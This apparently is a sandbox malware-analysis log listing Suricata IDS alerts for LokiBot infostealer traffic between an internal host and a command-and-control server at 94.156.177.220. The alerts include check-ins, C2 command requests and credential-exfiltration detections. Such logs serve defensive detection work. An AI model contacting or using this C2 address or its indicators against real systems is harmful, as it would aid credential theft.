Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49177
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49179
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49174
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49172 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49175 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49175 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49172 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49190
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49175 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49178
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49204
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49175 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49175 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49180
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49175
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49197
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49186
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49198
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49173 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49187
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49173 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49173 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49176
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49173
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49188
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49182
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49189
